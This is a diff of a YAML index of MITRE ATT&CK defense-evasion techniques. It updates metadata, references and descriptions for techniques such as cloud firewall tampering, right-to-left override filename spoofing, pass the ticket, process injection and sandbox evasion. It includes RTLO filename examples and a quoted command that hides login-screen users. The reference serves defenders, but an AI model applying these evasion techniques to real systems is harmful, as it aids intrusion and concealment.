+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
